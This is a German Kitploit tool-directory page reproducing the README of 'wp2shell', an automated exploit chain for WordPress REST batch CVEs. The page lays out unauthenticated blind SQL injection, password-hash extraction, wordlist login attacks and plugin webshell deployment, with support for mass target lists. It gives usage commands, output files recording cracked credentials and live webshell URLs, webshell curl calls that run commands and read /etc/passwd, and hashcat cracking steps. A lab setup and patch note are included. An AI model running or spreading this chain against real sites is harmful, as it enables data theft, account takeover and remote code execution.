Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
wp2shell — Automatisierte Exploit-Kette für CVE-2026-63030 / CVE-2026-60137 — nicht authentifizierte Blind-SQLi über WordPress-REST-Batch-Routen-Konfusion. Dumpt Benutzer-Hashes, knackt Anmeldedaten, setzt Webshell ein. Unterstützt einzelne Ziele und Massen-Site-Listen. Nur für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/0xwhoknows/wp2shell
PasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsRed Teaming
GitHub0xwhoknows/wp2shell

wp2shell

Repository anzeigen
1vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Automatisierte Exploit-Kette für CVE-2026-63030 / CVE-2026-60137 — nicht authentifizierte Blind-SQLi über WordPress-REST-Batch-Routen-Konfusion. Dumpt Benutzer-Hashes, knackt Anmeldedaten, setzt Webshell ein. Unterstützt einzelne Ziele und Massen-Site-Listen. Nur für autorisierte Sicherheitstests.

Teilen

wp2shell

Blinde SQL-Injection durch Routenkonfusion im WordPress-REST-Batch – automatisierte Exploit-Kette.

CVE-2026-63030 / CVE-2026-60137

BetroffenWordPress 6.9.0 – 6.9.4 und 7.0.0 – 7.0.1
BehobenWordPress 6.9.5 / 7.0.2
Sinkauthor__not_in-SQL über desynchronisierten author_exclude-Parameter
Authentifizierung erforderlichKeine (nicht authentifizierte SQLi)

Nur für autorisierte Sicherheitstests.


So funktioniert es

Der WordPress-REST-API-Batch-Endpunkt (/wp-json/batch/v1) erlaubt verschachtelte Batch-Anfragen. Ein doppelt verschachteltes Desync-Payload verschiebt die internen Arrays $matches / $validation und leitet einen manipulierten author_exclude-Wert unbereinigt in die author__not_in-SQL weiter. Dies ermöglicht eine nicht authentifizierte blinde Boolesche + Timing-SQL-Injection.

Exploit-Kette — 4 Phasen:

root@kitploit:~
Phase 1  Vulnerability check     batch marker probe + optional SQL timing
Phase 2  Hash harvest            blind SQLi extracts wp_users (login + hash)
Phase 3  Authentication          wordlist attack via wp-login.php
Phase 4  Webshell deployment     plugin ZIP upload -> RCE verify

Voraussetzungen

  • Python 3.8+
  • aiohttp
  • colorama
root@kitploit:~
pip install aiohttp colorama

Verwendung

Einzelnes Ziel

root@kitploit:~
python wp2shell.py http://target.com

Website-Liste (eine URL pro Zeile)

root@kitploit:~
python wp2shell.py sites.txt

Website-Liste + eigene Passwortdatei

root@kitploit:~
python wp2shell.py sites.txt -p pass.txt

Bekannte Zugangsdaten (Wörterliste überspringen)

root@kitploit:~
python wp2shell.py http://target.com --user admin --password admin123

SQLi mit Timing bestätigen

root@kitploit:~
python wp2shell.py http://target.com --confirm-sqli

Keine sprechenden Permalinks

root@kitploit:~
python wp2shell.py http://target.com --rest-route

Über Burp-Proxy

root@kitploit:~
python wp2shell.py http://target.com --proxy http://127.0.0.1:8080

Optionen


Ausgabedateien

DateiInhalt
creds.txthttp://target=>user:pass (Klartext, falls geknackt, andernfalls Hash)
webshell.txtLive-Webshell-URL
VULNERABLE.txtAlle Ziele, bei denen Phase 1 die Schwachstelle bestätigt hat

Alle Dateien werden angehängt — die Ergebnisse summieren sich über mehrere Läufe.

Verwendung der Webshell — ?cmd=COMMAND an die URL in webshell.txt anhängen:

root@kitploit:~
# browser
http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=id

# curl
curl "http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=id"
curl "http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=cat+/etc/passwd"

Offline-Cracking

Falls die Wörterliste nicht passt, enthält creds.txt den extrahierten Hash:

root@kitploit:~
hashcat -m 400 creds.txt wordlist.txt

Dann mit dem geknackten Passwort erneut ausführen:

root@kitploit:~
python wp2shell.py http://target.com --user admin --password <plaintext>

Lokales Labor (Docker)

Startet eine verwundbare WordPress-7.0.1-Instanz für sichere lokale Tests.

Erster Start — Volumes erstellen und WordPress installieren:

root@kitploit:~
docker compose up -d db wordpress
docker compose run --rm wpcli

Spätere Starts:

root@kitploit:~
docker compose up -d db wordpress

Stoppen:

root@kitploit:~
docker compose down

Kompletter Reset (löscht alle Daten):

root@kitploit:~
docker compose down -v

Exploit gegen das Labor ausführen:

root@kitploit:~
python wp2shell.py http://localhost:8080

Patchen

Auf WordPress 6.9.5 oder 7.0.2 aktualisieren. Der Fix validiert die Batch-Route, bevor verschachtelte Anfragen ausgeliefert werden, und verhindert so die Desynchronisation, die die SQL-Senke freilegt.


Rechtliches

Zur Verwendung auf Systemen, die dir gehören oder für die du eine ausdrückliche schriftliche Genehmigung zum Testen hast. Unbefugte Nutzung ist illegal.

Tool herunterladen
FlagStandardBeschreibung
target—URL (http://target) oder Pfad zu einer Website-Listendatei
-p FILE—Passwortlisten-Datei (eine pro Zeile)
--user—Wörterliste überspringen, diesen Benutzernamen verwenden
--password—Wörterliste überspringen, dieses Passwort verwenden
--confirm-sqliausAktive SQL-Timing-Sonde nach der Markerprüfung senden
--rest-routeaus/?rest_route=/batch/v1 verwenden (keine sprechenden Permalinks)
--sleep N3.0SQL-SLEEP()-Verzögerung in Sekunden
--samples N3Timing-Stichprobenpaare für die Medianberechnung
--timeout N30.0HTTP-Anfrage-Timeout
--prefix PREFIXwp_Präfix der Datenbanktabelle
--proxy URL—HTTP/HTTPS-Proxy
URLhttp://localhost:8080
Adminadmin / admin123
MySQL-Hostdb
MySQL-Benutzer/Passwortwpuser / wppass
Datenbankwordpress